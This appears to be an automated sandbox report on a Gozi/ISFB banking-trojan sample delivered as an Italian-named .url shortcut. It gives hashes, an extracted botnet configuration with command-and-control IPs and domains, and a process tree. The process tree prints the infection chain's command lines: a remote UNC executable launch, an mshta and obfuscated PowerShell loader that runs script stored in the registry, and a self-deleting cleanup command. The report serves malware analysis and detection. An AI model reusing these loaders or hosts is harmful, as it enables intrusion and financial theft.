gozi | bf127718f51d65b4dffceba87fea35ce602bf7557e9a18411238be79bed2c45d

Analysis

max time kernel
151s
max time network
145s
platform
windows10-2004_x64
resource
win10v2004-20230915-en
resource tags

arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
submitted
03-10-2023 16:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Informazioni.url
Size

192B
MD5

c6c6f5a3d3e0444820d2865c7f1a07bc
SHA1

5f9c9620e315b09802e8e532f48195a9e60f2d2c
SHA256

59944e8c11bfc2d065ef88fca0a033313361ae424962c34573755da99badbf3f
SHA512

4a1a66efff8336bbde327c9256e6e473193c901bc47d1b7648bbfa29212490f3f47092ba060c47cc77a1e6952f6bf814346045d2d1c1eef556ba07d08f69c628

Score

10^/10

gozi 5050 banker isfb trojan

Malware Config

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

5050

185.247.184.139

62.72.33.155

incontroler.com

Attributes

base_path
/jerry/
build
250260
exe_type
loader
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Extracted

Family

gozi

Botnet

5050

expirew.com

whofos.com

onlinepoints.online

onlinepoints.top

Attributes

base_path
/pictures/
build
250260
exe_type
worker
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Signatures

Gozi
Gozi is a well-known and widely distributed banking trojan.
banker trojan gozi

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

rundll32.exemshta.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Control Panel\International\Geo\Nation	rundll32.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Control Panel\International\Geo\Nation	mshta.exe

Suspicious use of SetThreadContext 8 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 5080 set thread context of 3156	5080	powershell.exe	Explorer.EXE
PID 3156 set thread context of 3744	3156	Explorer.EXE	RuntimeBroker.exe
PID 3156 set thread context of 3196	3156	Explorer.EXE	RuntimeBroker.exe
PID 3156 set thread context of 4936	3156	Explorer.EXE	RuntimeBroker.exe
PID 3156 set thread context of 4868	3156	Explorer.EXE	cmd.exe
PID 3156 set thread context of 4652	3156	Explorer.EXE	RuntimeBroker.exe
PID 4868 set thread context of 532	4868	cmd.exe	PING.EXE
PID 3156 set thread context of 688	3156	Explorer.EXE	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

2520 496 WerFault.exe client.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

532 PING.EXE
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

PING.EXE

pid process

532 PING.EXE

pid	pid_target	process	target process
2520	496	WerFault.exe	client.exe

pid	process
532	PING.EXE

pid	process
532	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

client.exepowershell.exeExplorer.EXE

pid	process
496	client.exe
496	client.exe
5080	powershell.exe
5080	powershell.exe
5080	powershell.exe
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

3156 Explorer.EXE
Suspicious behavior: MapViewOfSection 8 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

pid process

5080 powershell.exe
3156 Explorer.EXE
3156 Explorer.EXE
3156 Explorer.EXE
3156 Explorer.EXE
3156 Explorer.EXE
4868 cmd.exe
3156 Explorer.EXE

pid	process
3156	Explorer.EXE

pid	process
5080	powershell.exe
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
4868	cmd.exe
3156	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 9 IoCs

Processes:

powershell.exeExplorer.EXE

description	pid	process
Token: SeDebugPrivilege	5080	powershell.exe
Token: SeShutdownPrivilege	3156	Explorer.EXE
Token: SeCreatePagefilePrivilege	3156	Explorer.EXE
Token: SeShutdownPrivilege	3156	Explorer.EXE
Token: SeCreatePagefilePrivilege	3156	Explorer.EXE
Token: SeShutdownPrivilege	3156	Explorer.EXE
Token: SeCreatePagefilePrivilege	3156	Explorer.EXE
Token: SeShutdownPrivilege	3156	Explorer.EXE
Token: SeCreatePagefilePrivilege	3156	Explorer.EXE

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Explorer.EXE

pid process

3156 Explorer.EXE
Suspicious use of UnmapMainImage 1 IoCs

Processes:

Explorer.EXE

pid process

3156 Explorer.EXE

pid	process
3156	Explorer.EXE

pid	process
3156	Explorer.EXE

Suspicious use of WriteProcessMemory 49 IoCs

Processes:

rundll32.exemshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 4204 wrote to memory of 496	4204	rundll32.exe	client.exe
PID 4204 wrote to memory of 496	4204	rundll32.exe	client.exe
PID 4204 wrote to memory of 496	4204	rundll32.exe	client.exe
PID 3296 wrote to memory of 5080	3296	mshta.exe	powershell.exe
PID 3296 wrote to memory of 5080	3296	mshta.exe	powershell.exe
PID 5080 wrote to memory of 1108	5080	powershell.exe	csc.exe
PID 5080 wrote to memory of 1108	5080	powershell.exe	csc.exe
PID 1108 wrote to memory of 948	1108	csc.exe	cvtres.exe
PID 1108 wrote to memory of 948	1108	csc.exe	cvtres.exe
PID 5080 wrote to memory of 1340	5080	powershell.exe	csc.exe
PID 5080 wrote to memory of 1340	5080	powershell.exe	csc.exe
PID 1340 wrote to memory of 3412	1340	csc.exe	cvtres.exe
PID 1340 wrote to memory of 3412	1340	csc.exe	cvtres.exe
PID 5080 wrote to memory of 3156	5080	powershell.exe	Explorer.EXE
PID 5080 wrote to memory of 3156	5080	powershell.exe	Explorer.EXE
PID 5080 wrote to memory of 3156	5080	powershell.exe	Explorer.EXE
PID 5080 wrote to memory of 3156	5080	powershell.exe	Explorer.EXE
PID 3156 wrote to memory of 3744	3156	Explorer.EXE	RuntimeBroker.exe
PID 3156 wrote to memory of 3744	3156	Explorer.EXE	RuntimeBroker.exe
PID 3156 wrote to memory of 3744	3156	Explorer.EXE	RuntimeBroker.exe
PID 3156 wrote to memory of 3744	3156	Explorer.EXE	RuntimeBroker.exe
PID 3156 wrote to memory of 3196	3156	Explorer.EXE	RuntimeBroker.exe
PID 3156 wrote to memory of 3196	3156	Explorer.EXE	RuntimeBroker.exe
PID 3156 wrote to memory of 4868	3156	Explorer.EXE	cmd.exe
PID 3156 wrote to memory of 4868	3156	Explorer.EXE	cmd.exe
PID 3156 wrote to memory of 4868	3156	Explorer.EXE	cmd.exe
PID 3156 wrote to memory of 3196	3156	Explorer.EXE	RuntimeBroker.exe
PID 3156 wrote to memory of 3196	3156	Explorer.EXE	RuntimeBroker.exe
PID 3156 wrote to memory of 4936	3156	Explorer.EXE	RuntimeBroker.exe
PID 3156 wrote to memory of 4936	3156	Explorer.EXE	RuntimeBroker.exe
PID 3156 wrote to memory of 4936	3156	Explorer.EXE	RuntimeBroker.exe
PID 3156 wrote to memory of 4936	3156	Explorer.EXE	RuntimeBroker.exe
PID 3156 wrote to memory of 4652	3156	Explorer.EXE	RuntimeBroker.exe
PID 3156 wrote to memory of 4652	3156	Explorer.EXE	RuntimeBroker.exe
PID 3156 wrote to memory of 4868	3156	Explorer.EXE	cmd.exe
PID 3156 wrote to memory of 4652	3156	Explorer.EXE	RuntimeBroker.exe
PID 3156 wrote to memory of 4652	3156	Explorer.EXE	RuntimeBroker.exe
PID 3156 wrote to memory of 4868	3156	Explorer.EXE	cmd.exe
PID 3156 wrote to memory of 688	3156	Explorer.EXE	cmd.exe
PID 3156 wrote to memory of 688	3156	Explorer.EXE	cmd.exe
PID 3156 wrote to memory of 688	3156	Explorer.EXE	cmd.exe
PID 3156 wrote to memory of 688	3156	Explorer.EXE	cmd.exe
PID 4868 wrote to memory of 532	4868	cmd.exe	PING.EXE
PID 4868 wrote to memory of 532	4868	cmd.exe	PING.EXE
PID 4868 wrote to memory of 532	4868	cmd.exe	PING.EXE
PID 4868 wrote to memory of 532	4868	cmd.exe	PING.EXE
PID 4868 wrote to memory of 532	4868	cmd.exe	PING.EXE
PID 3156 wrote to memory of 688	3156	Explorer.EXE	cmd.exe
PID 3156 wrote to memory of 688	3156	Explorer.EXE	cmd.exe

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3744

C:\Windows\System32\rundll32.exe
"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL C:\Users\Admin\AppData\Local\Temp\Informazioni.url
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4204

\??\UNC\62.173.146.46\scarica\client.exe
"\\62.173.146.46\scarica\client.exe"
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:496

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 496 -s 472
3⤵
- Program crash
PID:2520

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4936

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3196

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
PID:3156

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "about:<hta:application><script>L2if='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(L2if).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\D75FCFBE-4A7B-21B2-0CFB-1EE5005F32E9\\\MemoryLocal'));if(!window.flag)close()</script>"
2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3296

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fyaxafftc -value gp; new-alias -name xuojhr -value iex; xuojhr ([System.Text.Encoding]::ASCII.GetString((fyaxafftc "HKCU:Software\AppDataLow\Software\Microsoft\D75FCFBE-4A7B-21B2-0CFB-1EE5005F32E9").ProcessActive))
3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5080

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\iik411s4\iik411s4.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:1108

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6404.tmp" "c:\Users\Admin\AppData\Local\Temp\iik411s4\CSC4C02830939C64F0B8B8630EC5D336D34.TMP"
5⤵
PID:948

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\adpbnxuo\adpbnxuo.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:1340

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6750.tmp" "c:\Users\Admin\AppData\Local\Temp\adpbnxuo\CSCF0D553C4CCDE4FDDB9DFCD8375232B18.TMP"
5⤵
PID:3412

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "\\62.173.146.46\scarica\client.exe"
2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:4868

C:\Windows\system32\PING.EXE
ping localhost -n 5
3⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:532

C:\Windows\syswow64\cmd.exe
"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
2⤵
PID:688

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4652

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 496 -ip 496
1⤵
PID:4416

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES6404.tmp

Filesize
1KB

MD5
d0541a62f5f8288f06de543ad891ded8

SHA1
82c17f84b94266d1a85f106a09b46b280dae2d09

SHA256
891c27dcc24e5dc05dbc96de6e28458db08a1e5832a16c31e7ab0694f6a989e6

SHA512
168cf5a52781dafbc9f3e770b3de828916288e78b6b335232008ecea8a25157ff89d903eb7badb5dc70585b6ecc2850ce204bde0191de195b677076029d9d606

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES6750.tmp

Filesize
1KB

MD5
9a8c7537551cbf0d7a75c6f2d927940c

SHA1
0b5ee6c52ad7a141b7b469750e9e95dce2b9d243

SHA256
04fecb8ff012fc434a2f545d122c559716cff13b501fe5337e529f348e11f5a7

SHA512
1a874e89c9750b214530fa73a55ef86ea7444fa733babcc3cc9079495c9df11b06e9884119f1a26c27bea01c5ebc1b703071564e836d7bbc5f3d74ef4847952e

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rvl4tbwg.ror.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\adpbnxuo\adpbnxuo.dll

Filesize
3KB

MD5
ca9e80021560480c1cb96b3c65039040

SHA1
abae29480483ed5900864b1280d54e7fe2f0a70e

SHA256
7f563c1bb94b686e0aa537ac142e707b1fc0b5dac0cf5d791cb0eec7325d1e96

SHA512
95664242c661296c59a19b54dce28cecc8ef0d361dbfa42a84d9ab62386be5b59561257ff4c3d2c435901c2c9fea89524d849708f1e611e745da395425a10bcc

Download Submit
C:\Users\Admin\AppData\Local\Temp\iik411s4\iik411s4.dll

Filesize
3KB

MD5
c542245fd06ed94d7bb4bae83743d52a

SHA1
686bb8227e95e1a478d0c49b15cfa69b99308feb

SHA256
fc62ea7d8262f942841496c16c71453e04329e73826f47f36bd942bb334ac687

SHA512
bc33f42012d68d5d6058a346be9ac6b9d4be4c3b8339c6b0da067a09de0be6badfe0a87f34a4d4a65c410e18263d889e4c06e500c1af86d8c865e42063da8834

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\adpbnxuo\CSCF0D553C4CCDE4FDDB9DFCD8375232B18.TMP

Filesize
652B

MD5
5f5ab3d65e010ab6af5330066c83e367

SHA1
5b198fd5d0df0615077fb0bca59b4ec472dac685

SHA256
12cfed10e9f2387a5c275cbb0dd5fdd6b6ac251c2c16feee89852004a8dd406d

SHA512
3e528a40ddc0b0718168febe7edee76593075aca64203bc8acd7bdc4c99b97c9e50812f9bfef450d9d397280ef0f08ad96d978a0d8edc0c64e4218880783214c

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\adpbnxuo\adpbnxuo.0.cs

Filesize
406B

MD5
ca8887eacd573690830f71efaf282712

SHA1
0acd4f49fc8cf6372950792402ec3aeb68569ef8

SHA256
568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3

SHA512
2a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\adpbnxuo\adpbnxuo.cmdline

Filesize
369B

MD5
a8bdd5b219cea16f4b06f63f5ade9a01

SHA1
c43d4889d6ea357e93874589606a638ee47b184b

SHA256
7c284439f49c53cf6c8396974868f436fb4334e09e0486c06be31ab34d96255e

SHA512
bc7576414bc4c6c6bb3679ae603605848fcce196ad8ddb90dab5d749dc92ea8040991b6f9a765316aff0384eb9efe67cc0c812dc15dd7e22ea4c1fbcbe4ada10

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\iik411s4\CSC4C02830939C64F0B8B8630EC5D336D34.TMP

Filesize
652B

MD5
04ccc63e952287b2e5e36c3727d390de

SHA1
dfd0a1852ae7009f2700e9ec89ef423575c0b574

SHA256
e85be18bc78e1c731d8f184a983b596fd3c08156237b562059f3405b23ded01a

SHA512
b88f746c6aef785ba38074acf37068f4c8d8cb3e49def9c3a8093a9ab14fb89be6ea2c4420c4b454d3825f39494e27beb90d409e9c3d688ccfeb7cf2c2129231

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\iik411s4\iik411s4.0.cs

Filesize
405B

MD5
caed0b2e2cebaecd1db50994e0c15272

SHA1
5dfac9382598e0ad2e700de4f833de155c9c65fa

SHA256
21210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150

SHA512
86dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\iik411s4\iik411s4.cmdline

Filesize
369B

MD5
2b798c670375c92df5868d9590d10eb5

SHA1
8f89aeee4dadb10321fe01c6ccf83b47d4f4431d

SHA256
c7e9b02f2d17f273f65f0083e8f8c5d9b839bd72008fcbd1dfd7aa5a1cf37d91

SHA512
5583799b1245fdf9fb077814ff3b6743fcd997aa399ad75c1fa8e1b12caf4768a5274d03bf99fc58b12dfa5c8e98b0a208742865e8c4aad020141c43e1468a09

Download Submit
memory/496-8-0x0000000003EB0000-0x0000000003EBD000-memory.dmp

Filesize
52KB

Download
memory/496-6-0x0000000003E90000-0x0000000003E9B000-memory.dmp

Filesize
44KB

Download
memory/496-1-0x0000000002300000-0x0000000002400000-memory.dmp

Filesize
1024KB

Download
memory/496-2-0x0000000003E90000-0x0000000003E9B000-memory.dmp

Filesize
44KB

Download
memory/496-113-0x0000000000400000-0x0000000002290000-memory.dmp

Filesize
30.6MB

Download
memory/496-3-0x0000000000400000-0x0000000002290000-memory.dmp

Filesize
30.6MB

Download
memory/496-11-0x0000000000400000-0x0000000002290000-memory.dmp

Filesize
30.6MB

Download
memory/496-4-0x0000000002300000-0x0000000002400000-memory.dmp

Filesize
1024KB

Download
memory/496-7-0x0000000000400000-0x0000000002290000-memory.dmp

Filesize
30.6MB

Download
memory/496-5-0x0000000000400000-0x0000000002290000-memory.dmp

Filesize
30.6MB

Download
memory/532-105-0x00000167BDCF0000-0x00000167BDD94000-memory.dmp

Filesize
656KB

Download
memory/532-107-0x00000167BDB70000-0x00000167BDB71000-memory.dmp

Filesize
4KB

Download
memory/532-116-0x00000167BDCF0000-0x00000167BDD94000-memory.dmp

Filesize
656KB

Download
memory/688-110-0x0000000000F40000-0x0000000000FD8000-memory.dmp

Filesize
608KB

Download
memory/3156-106-0x0000000008840000-0x00000000088E4000-memory.dmp

Filesize
656KB

Download
memory/3156-59-0x0000000008840000-0x00000000088E4000-memory.dmp

Filesize
656KB

Download
memory/3156-60-0x0000000002810000-0x0000000002811000-memory.dmp

Filesize
4KB

Download
memory/3196-115-0x0000026477110000-0x00000264771B4000-memory.dmp

Filesize
656KB

Download
memory/3196-80-0x00000264770D0000-0x00000264770D1000-memory.dmp

Filesize
4KB

Download
memory/3196-79-0x0000026477110000-0x00000264771B4000-memory.dmp

Filesize
656KB

Download
memory/3744-73-0x000001D734880000-0x000001D734924000-memory.dmp

Filesize
656KB

Download
memory/3744-112-0x000001D734880000-0x000001D734924000-memory.dmp

Filesize
656KB

Download
memory/3744-74-0x000001D734930000-0x000001D734931000-memory.dmp

Filesize
4KB

Download
memory/4652-91-0x000001CD9B640000-0x000001CD9B6E4000-memory.dmp

Filesize
656KB

Download
memory/4652-92-0x000001CD9B1B0000-0x000001CD9B1B1000-memory.dmp

Filesize
4KB

Download
memory/4652-119-0x000001CD9B640000-0x000001CD9B6E4000-memory.dmp

Filesize
656KB

Download
memory/4868-117-0x000001F63B870000-0x000001F63B914000-memory.dmp

Filesize
656KB

Download
memory/4868-96-0x000001F63B870000-0x000001F63B914000-memory.dmp

Filesize
656KB

Download
memory/4868-99-0x000001F63B920000-0x000001F63B921000-memory.dmp

Filesize
4KB

Download
memory/4936-118-0x000002B7BC9C0000-0x000002B7BCA64000-memory.dmp

Filesize
656KB

Download
memory/4936-85-0x000002B7BC9C0000-0x000002B7BCA64000-memory.dmp

Filesize
656KB

Download
memory/4936-86-0x000002B7BA7C0000-0x000002B7BA7C1000-memory.dmp

Filesize
4KB

Download
memory/5080-27-0x000001C59CC90000-0x000001C59CCA0000-memory.dmp

Filesize
64KB

Download
memory/5080-71-0x000001C59CFD0000-0x000001C59D00D000-memory.dmp

Filesize
244KB

Download
memory/5080-70-0x00007FFF65F20000-0x00007FFF669E1000-memory.dmp

Filesize
10.8MB

Download
memory/5080-57-0x000001C59CFD0000-0x000001C59D00D000-memory.dmp

Filesize
244KB

Download
memory/5080-55-0x000001C59CFC0000-0x000001C59CFC8000-memory.dmp

Filesize
32KB

Download
memory/5080-41-0x000001C59CFA0000-0x000001C59CFA8000-memory.dmp

Filesize
32KB

Download
memory/5080-28-0x000001C59CC90000-0x000001C59CCA0000-memory.dmp

Filesize
64KB

Download
memory/5080-26-0x000001C59CC90000-0x000001C59CCA0000-memory.dmp

Filesize
64KB

Download
memory/5080-25-0x00007FFF65F20000-0x00007FFF669E1000-memory.dmp

Filesize
10.8MB

Download
memory/5080-15-0x000001C59CC20000-0x000001C59CC42000-memory.dmp

Filesize
136KB

Download